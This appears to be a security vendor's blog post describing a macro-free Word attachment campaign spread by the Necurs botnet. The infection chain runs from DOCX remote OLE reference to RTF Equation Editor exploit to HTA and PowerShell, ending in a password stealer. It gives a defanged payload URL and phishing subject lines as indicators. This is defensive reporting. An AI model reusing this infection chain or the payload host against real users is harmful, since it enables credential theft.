Malicious Microsoft Office attachments trick their victims

walden, system, systems, walden systems, rita, firewall, port, forward, up, protect, intrusion, security, traffic, DMZ, block, protection, walden systems, walden, systems, network, fire, wall, hack, intrusion, cisco, router, network, switch, hub, IoT, traffic
Rita gives you full control of what sites your employees visit. Rita can block sites that eat up your precious bandwidth such as media streaming sites. Rita enables you full control of what sites your employees can and cannot visit. Rita gives you the ability to block undesirable sites by wildcard or by name. Rita gives you the ability to determine which computers will be blocked and which will be allowed. With Rita, you can block access to sensitive servers within your LAN.



     Malicious Microsoft Office attachments usually require hackers to trick victims into enabling macros. A new malicious email campaign has been reported that uses Office attachments that are macro free. The attacks don't generate the default warning from Microsoft associated with macro-based attacks. When opening attachments, there are no warnings or pop-ups alerting victims.

     The attack uses malicious Word attachments that activate a four-stage infection process that exploits the Office Equation Editor vulnerability that was patched last year by Microsoft. The code is designed to steal credentials from the victim's email, FTP and browsers. Many researchers have compoared the layered nature of the attack to a turducken. Researchers state that the code string uses a combination of techniques that start with a .DOCX attachment. The spam originates from for the Necurs botnet. Email subject lines fall into four financially related categories: "TNT STATEMENT OF ACCOUNT", "Request for Quotation", "Telex Transfer Notification" and "SWIFT COPY FOR BALANCE PAYMENT." All of the emails had the attachment named receipt.docx.




     The multi stage infection process begins when the .DOCX file is opened and triggers an embedded OLE object that contains external references. This feature allows external access to remote OLE objects to be referenced in the document.xml.rels. According to security experts, hackers are taking advantage of the fact that Microsoft Office 2007 uses the OpenXML format. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually. In the next stage, the .DOCX file triggers a download of an RTF file. When user opens the DOCX file, it accesses a remote document file from the URL, http://gamestoredownload(.)download/WS-word2017pa(.)doc. This is actually a RTF file that is downloaded and executed. The next stage involves the RTF file exploiting the Office Equation Editor vulnerability. In November, Microsoft patched the vulnerability. The Office Equatio Editor is used to insert and edit complex equations as OLE items in Microsoft Word documents. The next stage involves the decoding of text inside the RTF file that in turn triggers a MSHTA command line that downloads and executes an HTML executable HTA file. Next, the HTA executes an obfuscated PowerShell Script which downloads and executes the remote payload, the Password Stealer Malware. The malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and use the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.

     The elaborate number of stages and methods used in these attacks are unusual. Another point is that the attack uses file types ( DOCX, RTF and HTA ), that aren't often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF. In the end, be careful about opening up unexpected Office documents and keep your patches up to date.